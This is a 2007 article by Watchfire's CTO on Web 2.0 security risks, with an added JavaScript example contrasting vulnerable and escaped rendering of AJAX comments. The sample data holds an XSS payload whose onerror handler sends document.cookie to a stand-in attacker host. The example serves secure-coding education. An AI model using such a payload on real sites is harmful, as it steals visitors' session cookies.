December 08, 2007

The security implications of Web 2.0

A car that has fewer options has fewer things that can break. Power steering, power locks, power seats, seat warmers, and the myriad of other car features provide a better experience, but they also add more items that require maintenance.

Michael Weider, CTO and Founder, Watchfire

The same complexities we see with a fully loaded car apply to web functionality. Web 2.0 has arrived, and the race to adopt it has brought with it collaborative online environments, socially driven content that is redefining both how web applications are developed and how they are used. The result is a richer, more fulfilling web experience. The consequence, however, is that the dynamic new Web 2.0 design principles open a host of new avenues of attack to which Web 2.0-based web applications are vulnerable.

With the explosion of Web 2.0 concepts powering more and more websites, the web is reaching new potentials for interactivity. But with that progress it becomes even more important to proactively address the heightened security and privacy vulnerabilities, as the same technologies that make for a more user-friendly web, can also make for less secure web applications.

This article will highlight the most common Web 2.0 vulnerabilities that privacy and security professionals need to be aware of, including better understanding for how Web services and AJAX can be exploited and the attacks that they can enable. Readers will also learn tips and best practices for securing next-generation applications that can be applied immediately as enterprises continue the push to deploy Web 2.0, ensuring they can meet both current and future online security challenges.

What is Web 2.0?
Web 2.0 carries a high profile and a great deal of surrounding hype. There is increasing pressure on developers to quickly adopt this new second generation of dynamic, interactive and simple-by-design technologies. Web 2.0 can be described in two ways:

1) New ways to build rich web sites.
Although not always characterized as Web 2.0 in their own right, Asynchronous JavaScript and XML (AJAX) and other new rapid application development techniques are in vogue for creating rich web sites that are highly interactive and more easily deployed and used.

AJAX delivers a rich user interface by updating parts of a page with dynamic content fetched in the background, without a full page reload. Another common technique is Really Simple Syndication (RSS), an XML-based standard that lets publishers syndicate information feeds that subscribers pull on a regular basis. This is most commonly used to subscribe to blogs and news articles.

2) Socially driven content.
Think MySpace.com. The web experience is now defined by community and by content created and posted by web users. Websites are now amorphous entities, and their vitality is defined by the people who visit them.

In the last couple of years, the web has moved from a collection of static pages to a more interactive and dynamic environment. This shift has been heralded as Web 2.0 and has given more users more power. No longer is the web a place where only technical folks can produce content. Instead, with the click of a button non-technical users from children to seniors are able to upload information to personal or corporate sites, produce interactive pages or share content. Popular dynamic sites such as YouTube, MySpace and Flickr are the poster children for this new web world.

Why adopt Web 2.0 technologies?
Competition and ease-of-use are at the top of the list as reasons why Web 2.0 is attractive. Like viral marketing, more companies want to communicate more directly to their prospective and current customers. Building sites that include interactive messaging, commenting and user areas allow for more open communication gates. Users can interact with other users and company executives.

Price is also a consideration. Web applications have proven to be more cost effective than their clunky client-server counterparts. Web 2.0 applications, built with Rapid Application Development (RAD) techniques, are built faster and therefore require even less of an investment.

Web 2.0 dangers
With Web 2.0, the functionality and experience of the sites become the primary focus, and the technology empowering the dynamic content is hidden behind the scenes to the average user. Yet the web applications underneath the polished finish remain just as complex, and add a variety of new and often unproven or unsecured technologies to the back end.

In the rush to unveil more interactive sites, developers are urged to release functional sites that often lack added security measures. Attackers have quickly learned to exploit the shortcomings in this code. This has resulted in an urgent need to audit and assess these sites for security vulnerabilities. In order for Web 2.0 technologies to reach their full potential, inherent security issues must be recognized and addressed, and businesses must incorporate security best practices into application development.

In addition to structural security flaws, there are also user-driven threats, including the posting of malicious content. Sites that encourage end-user postings typically have no way to stop the upload of content that might deliver malicious code (a script or an HTML tag carrying an event handler, for example) to every other visitor who views it. In similar ways, other user-driven web sites, including blogs, podcasts and social networking sites, are prone to both security and privacy issues. While it seems as though democracy has come to the Internet, more freedom means increased potential for abuse and errors.

As in our car example, the new features create new avenues for exploit. The majority of Web 1.0 users interacted with single functions on single pages. Now AJAX programming allows any given page to have dozens of features and functions, running independently as well as interacting with each other. Each of those functions is a separate request channel between browser and server, so the number of inputs that must be validated on a single page, and the number of places where output must be encoded, multiplies. Web application vulnerabilities that have been around for years do not go away; they simply have many more places to occur. The most common include SQL injection, cross-site scripting (XSS), buffer overflows, and attacks against SOAP and XML interfaces.
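The two paragraphs above describe user-posted content that carries script to other visitors, and AJAX pages that pull that content into the DOM through many small request channels. The following is an added example, not code from the original article or from Watchfire, showing the defect in its simplest form: a comment list fetched from a (constructed) JSON endpoint and rendered into HTML by string concatenation, next to the same rendering with HTML output encoding. The sample comments, the function names and the `unexpectedTags` check are all assumptions made for this illustration.

```javascript
// Added example (not from the original article). Constructed sample of what a
// JSON comments endpoint might hand back to an AJAX callback. The second and
// third entries are the kind of thing a malicious poster submits.
const SAMPLE_COMMENTS = [
  { author: 'alice', body: 'Nice post!' },
  { author: 'mallory',
    body: '<img src=x onerror="document.location=\'http://attacker.example/?c=\'+document.cookie">' },
  { author: '"><script>alert(1)</script>', body: 'hi' },
];

// Vulnerable rendering: untrusted strings are concatenated straight into
// markup, so any tag or attribute the poster wrote becomes part of the page
// for every visitor who loads the comment list.
function renderCommentsVulnerable(comments) {
  return comments
    .map(c => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join('');
}

// Encode the five characters that let text break out of an HTML text node or
// a quoted attribute. This is the minimum for inserting into element content
// or a double-quoted attribute; URL and script contexts need their own rules.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[ch]);
}

// Hardened rendering: every untrusted field passes through escapeHtml before
// it touches the markup. (In a browser, assigning to textContent or using
// createTextNode instead of innerHTML achieves the same thing without a
// hand-written encoder.)
function renderCommentsSafe(comments) {
  return comments
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('');
}

// Assumed check for this example: list the tag names present in the rendered
// markup that the template itself never emits. Only "li" and "b" are expected;
// anything else came from a poster.
function unexpectedTags(html, allowed = ['li', 'b']) {
  const found = new Set();
  for (const m of html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)) {
    const name = m[1].toLowerCase();
    if (!allowed.includes(name)) found.add(name);
  }
  return [...found].sort();
}

// Stand-alone run: shows the foreign tags that leak through the vulnerable
// renderer and the empty list produced by the hardened one.
console.log('vulnerable:', unexpectedTags(renderCommentsVulnerable(SAMPLE_COMMENTS)));
console.log('safe:      ', unexpectedTags(renderCommentsSafe(SAMPLE_COMMENTS)));
```

The point is not the encoder itself but where it sits: in an AJAX page every callback that writes server data into the DOM is a separate place this step can be forgotten, which is why a single shared rendering path that always encodes is preferable to per-feature string building.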

The dependence on technology means the new vulnerabilities brought by Web 2.0 are inevitable. Back in the old days of the web—even three or four years ago—users could boost security levels by turning off JavaScript. Doing so now would all but render the website useless. In effect, the user would be disabling the exact tools that make the web useful and efficient.

Why does my organization need to worry about Web 2.0 safety?
Organizations of all sizes and in every market with an internet presence have been attacked. Media reports regularly cover the larger companies, such as MySpace suffering from a QuickTime-based XSS worm, Yahoo Mail being hit by the Yamanner worm, and even Google's Gmail having to overcome XSS problems.

As in any other case of negative publicity there is damage to the brand name and potential lost business if your web applications fail because of security threats. But a greater risk is that sensitive data could be compromised and with that comes everything from minor legal headaches to large and public lawsuits.

How do I protect my web applications?
One of the most effective solutions is to fix weaknesses before they are ever launched. While it sounds like a common sense suggestion, most applications are not built with security in mind.

Overworked developers, who are not trained in security, are not building application level security into the process. As stated, one of the benefits of web applications is the speed to market. But with this comes the downside that long development cycles, which normally include heavy QA and security testing, are discarded in favor of posting applications live as soon as they are functional.

In order to ensure safe and working web applications, companies should adhere to strict security testing standards from the development phase through the QA phase of the build cycle. This can be done through the use of security scanning tools and penetration tests. Because these sites change constantly, it is also important to continue periodic post-deployment security testing to monitor the live state of the web site and its ever-changing applications.

Another important but sometimes overlooked suggestion is to monitor metrics on web application vulnerabilities throughout the development cycle. Keep track of all vulnerabilities and fixes. Management can’t address issues they don’t know about.

Monitoring vulnerabilities across the development cycle has a huge impact on the educational front as well. To stop the cycle and regain control over web application security, developers need to know what mistakes are being made so they do not continue to repeat them. Companies can also set limits on what types of content can be changed or uploaded. An organization's users can be educated as well: let them know about the dangers and how to prevent them while online.

While more user interaction may be the ultimate goal, it is important to first build threat models in order to determine what levels of risk the company can assume. A retail company's website, for example, can accept a lower security standard for a web application designed to locate a retail store near the user, while a higher security standard is required for the actual e-commerce and credit-card processing applications.

Lastly, Web 2.0 is here to stay, at least until new technology ushers us into the Web 3.0 phase. The trend is racing towards more user interaction and more power to the masses. With that in mind be sure to use technology judiciously and learn how to manage risk with all your website applications.

-Michael Weider is CTO and founder of Watchfire.
